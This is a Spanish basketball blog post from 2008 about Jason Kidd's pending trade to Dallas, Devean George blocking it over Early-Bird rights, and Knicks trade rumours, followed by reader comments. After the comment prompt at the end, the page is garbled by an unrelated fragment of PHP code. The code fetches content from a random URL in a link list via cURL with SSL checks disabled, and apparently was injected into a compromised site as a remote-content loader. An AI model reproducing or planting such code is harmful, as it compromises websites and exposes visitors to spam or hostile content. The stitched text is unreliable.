Casi cerrado el traspaso de Jason Kidd a Dallas

14 de February de 2008 por txusma

Como ya anunciamos en nuestra crónica de hoy y en anteriores artículos, es más que probable que Jason Kidd sea traspasado a los Dallas Mavericks hoy mismo pero en las últimas horas uno de los jugadores implicados en el trade ha cobrado un protagonismo inesperado. Se trata de Devean George, que poco antes del 0 de 11 en tiros que ha cosechado en su partido de anoche contra los Blazers, bloqueó el movimiento. Pero ¿cómo es posible que un jugador como George pueda bloquear un traspaso entre 2 franquicias de la NBA?¿Tiene acaso unos derechos de los que disponen muy pocas estrellas de la liga? La solución la encontramos en una poco conocida norma que dice que los jugadores con un solo año de contrato y derechos Early-Bird no pueden ser traspasados sin su consentimiento; y Devean George no quiere ser traspasado porque perdería esos derechos Early-Bird, que le permitirían fichar el año que viene en el mercado de agentes libres con mejores condiciones.

Sin este pequeño detalle, el traspaso estaría ya cerrado: Jason Kidd y Malik Allen acabarían en Dallas a cambio de Devin Harris, Jerry Stackhouse, DeSagana Diop, Maurice Ager, Devean George, 3 millones de dólares y un par de rondas de draft. Con este traspaso, los Nets liberarían el año que viene 10 millones de dólares (se rumorea incluso que podrían hacer un buyout del traspaso de Stakhouse y que éste volvería a los Mavs) y se hacen con un base joven y con talento (mala noticia para Marcus Williams). Para Dallas es un intento casi desesperado de alzarse con el anillo.

Otro consecuencia del traspaso de Kidd a los Mavericks es saber que pasaría en al All-Star Game. Ahora mismo, el base esta convocado para jugar en el Este, pero de producirse el traspaso marcharía al Oeste, con lo que no está claro en que equipo debería jugar. Es un hecho sin precedentes y una oportunidad más para Calderón, si finalmente Kidd no puede jugar con la conferencia en que ha sido votado.

Aparte del culebrón Kidd, otros rumores suenan fuerte en la NBA, sobre todo los que involucran a los Kincks. Por un lado, un posible traspaso entre los Knicks y los Kings en los que la franquicia neoyorquina recibiría a Ron Artest y Kenny Thomas a cambio de Eddie Curry y Jerome James; y por el otro, un trueque con Ben Wallace y Zach Randolph como protagonistas. Lo que está claro es que Isiah Thomas tiene ganas de moverse.

Comenta

9 comentarios a esta entrada

  1. Noelinho dice:
    #1

    Yo si fuera el dueño de los Knicks raptaría a Thomas hasta el día 21… pq miedo me da eso de que tiene ganas de moverse.

      Citar

  2. MagicJohnson32 dice:
    #2

    Isiah Thomas es maravillosamente previsible (lo de ‘maravilloso’ es para los que no tenemos ningún interés en ver a los Knicks en Playoffs, claro). Artest ha nacido para jugar en los Knicks, está claro que acabará allí. Si Darius Miles no estuviese semiretirado, seguro que ya lo habría fichado.

    Ah, y le ha costado pero al fin Devean George hace algo bueno para los Lakers, jeje. ¡¡Resiste, Devean!!

      Citar

  3. telekoman dice:
    #3

    Jojoj. En esa foto es casi imposible reconocer al Jason Kidd actual.

      Citar

  4. MagicJohnson32 dice:
    #4

    Ah, por cierto, para terminar de aclarar lo de los Bird rights… Éstos pertenecen a Dallas, y si traspasan al jugador se perderían. En el caso de que acabe la temporada en los Mavs, estos derechos permitirían a Dallas renovar a George sin verse afectado por el salary cap. Lo que alguien (alguien llamado Mark y apellidado Cuban, por ejemplo) debería explicar a Devean George es que los Mavs no tienen el más mínimo interés en renovarlo, y que ningún equipo tendrá la más mínima intención de hacerle un contrato por más de unos 2 millones, con lo cual una parte de la midlevel o includo la biannual ya serían suficiente.

    Qué jugador más malo, buf. Qué manía llegué a tenerle.

      Citar

  5. telekoman dice:
    #5

    ¿Y se pueden llegar a transpasar esos derechos, o una vez que se realice el transpaso los derechos se pierden irremisiblemente? Es decir, ¿no hay ningún resquicio legal para eso?
    Y Magic, supongo que el jugador sabrá que no se le quiere renovar. Vamos digo yo que si a Cuban le interesa Kidd ya se lo habrá dejado bien clarito.

      Citar

  6. MagicJohnson32 dice:
    #6

    No, no son traspasables, desaparecen si el jugador sale del equipo que le firmó ese contrato anual.

      Citar

  7. Garci dice:
    #7

    Joder, la que puede liar el puto paquete de Devean George. Que felicidad sentí cuando se fue de los lakers, jeje!!

      Citar

  8. xapa_croack dice:
    #8

    Kidd antes estaba mucho mas blanco, o son los focos??

      Citar

  9. MagicJohnson32 dice:
    #9

    Muy blanco, es verdad.

    Gran definición de Devean George la de “puto paquete”… En su ficha, en lugar de Small Forward debería aparecer “puto paquete”.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>